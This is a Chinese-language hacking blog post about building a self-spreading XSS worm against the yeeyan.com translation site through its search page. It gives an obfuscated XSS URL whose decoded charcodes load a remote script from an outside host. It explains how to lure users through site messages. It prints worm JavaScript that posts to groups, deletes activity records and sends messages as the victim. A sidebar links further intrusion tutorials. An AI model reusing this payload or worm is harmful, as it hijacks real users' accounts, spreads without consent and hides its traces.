|
[推荐]Search Engine XSS Worm
有挑战才有意思,为了诞生个Search Engine XSS Worm,这里拿yeeyan做实验了。译言http://www.yeeyan.com/是一个“发现、翻译、阅读中文之外的互联网精华”的web2.0网站,过滤系统真BT,不过其搜索引擎存在跨站,它的搜索引擎也真够BT,转义单引号、双引号,并且当搜索值含英文冒号:时就不返回搜索结果。于是我只能这样构造:
| 以下是引用片段: http://www.yeeyan.com/main/ysearch?q=%3Cs%63%72ipt%3Eeval(%53%74ring.f%72om%43%68ar%43ode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,119,119,119,46,48,120,51,55,46,99,111,109,47,121,121,46,106,115,62,60,47,115,99,114,105,112,116,62,39,41))%3C/s%63%72ipt%3E |
Q1、上面这个Search Engine XSS Trap如何包含远程蠕虫?
A1、因为蠕虫的代码会很多,不可能一次性出现在这个XSS Trap中(对比:复制自身的微型XSS Worm),所以要想办法利用这个XSS Trap来调用远程蠕虫。方法很多,你解码这个XSS Trap就知道我的方法:)
Q2、如何让其他验证用户访问这个Search Engine XSS Trap?
A2、 先给某几位用户发站内信(借用蠕虫本身就可以批量发送:)),欺骗其访问,一旦他们访问,则这个XSS Trap会调用远程蠕虫,蠕虫会获取他们的好友信息与他们的信箱信息等等,这里面都有其他用户的信息。于是这个Search Engine XSS Trap就可以随站内信系统大量传播。
Q2、蠕虫如何获取访问Search Engine XSS Trap的用户标志信息?
A3、这点很重要,蠕虫的传播是要很多宿主的,要获得这些宿主就必须能够很清晰地获取特定用户标志信息,比如他的ID、他的空间地址等等。蠕虫一旦传播开,那就是爆发式的:)。
这些问题我都解决了,于是yeeyan的这个Search Engine XSS Worm就成功诞生。蠕虫部分代码如下:
| 以下是引用片段: var _x=false; if(window.XMLHttpRequest){ _x=new XMLHttpRequest(); }else if(window.ActiveXObject){ _x=new ActiveXObject("Msxml2.XMLHTTP"); if(!_x){_x=new ActiveXObject("Microsoft.XMLHTTP");} } _1(); function _1(){ var _u=_3or7("GET","http://www.yeeyan.com/space/showme",null); re=/\<a href=\"\/space\/groups\/(.*?)\">/i r=_u.match(re); src="http://www.yeeyan.com/groups/newTopic/"; var _txt="HELLO YEEYAN."; argv_1="\r\n"; argv_1+="---------------------7964f8dddeb95fc5\r\nContent-Disposition: form-data; name=\"data[Post][content]\"\r\n\r\n"; argv_1+=(_txt+"\r\n"); argv_1+="---------------------7964f8dddeb95fc5\r\nContent-Disposition: form-data; name=\"ymsggroup\"\r\n\r\n"; argv_1+=(""+"\r\n"); argv_1+="---------------------7964f8dddeb95fc5\r\nContent-Disposition: form-data; name=\"ymsgee\"\r\n\r\n"; argv_1+=(r[1]+"\r\n"); argv_1+="---------------------7964f8dddeb95fc5\r\nContent-Disposition: form-data; name=\"ymsgee_username\"\r\n\r\n"; argv_1+=(r[1]+"\r\n"); argv_1+="---------------------7964f8dddeb95fc5--\r\n"; _3or7("POST",src,argv_1); var _del=_3or7("GET","http://www.yeeyan.com/space/deleteEvent/15429",null); //删除记录只需这样即可:) _2(); } function _2(){ src="http://www.yeeyan.com/space/compose_message"; var _to="Yasmin"; var _s="yeeyan"; var _m="HELLO:)" argv_1="\r\n"; argv_1+="---------------------7964f8dddeb95fc5\r\nContent-Disposition: form-data; name=\"data[receiver_name]\"\r\n\r\n"; argv_1+=(_to+"\r\n"); argv_1+="---------------------7964f8dddeb95fc5\r\nContent-Disposition: form-data; name=\"data[subject]\"\r\n\r\n"; argv_1+=(_s+"\r\n"); argv_1+="---------------------7964f8dddeb95fc5\r\nContent-Disposition: form-data; name=\"data[message][content]\"\r\n\r\n"; argv_1+=(_m+"\r\n"); argv_1+="---------------------7964f8dddeb95fc5\r\nContent-Disposition: form-data; name=\"data[message_id]\"\r\n\r\n"; argv_1+=(""+"\r\n"); argv_1+="---------------------7964f8dddeb95fc5\r\nContent-Disposition: form-data; name=\"data[action]\"\r\n\r\n"; argv_1+=("send"+"\r\n"); argv_1+="---------------------7964f8dddeb95fc5--\r\n"; _3or7("POST",src,argv_1); alert(0); } function _3or7(_m,_s,_a){ _x.open(_m,_s,false); if(_m=="POST")_x.setRequestHeader("Content-Type","multipart/form-data; boundary=-------------------7964f8dddeb95fc5"); _x.send(_a); return _x.responseText; } |
| 没有路由密码权限时的鸽子上线方 | 08-23 |
| 完全解析网页后门和挂马 | 04-02 |
| 真实的网络攻击取证纪实 | 03-27 |
| 利用404错误页面挂马 | 03-21 |
| 解密风暴 | 03-21 |
| 社会工程学在黑客中的应用 | 01-02 |
| 轻轻松松解密各种网页木马 | 12-21 |
| SA权限无xp_cmdshell时取权限又一 | 12-14 |
| sqlserver2005中恢复xp_cmdshell | 11-10 |
| 实现无net.exe和net1.exe添加系统 | 10-26 |
| 用U盘轻松去除XP管理员密码 | 10-26 |
| 教你多种保护措施限用移动硬盘 | 10-09 |
您现在的位置: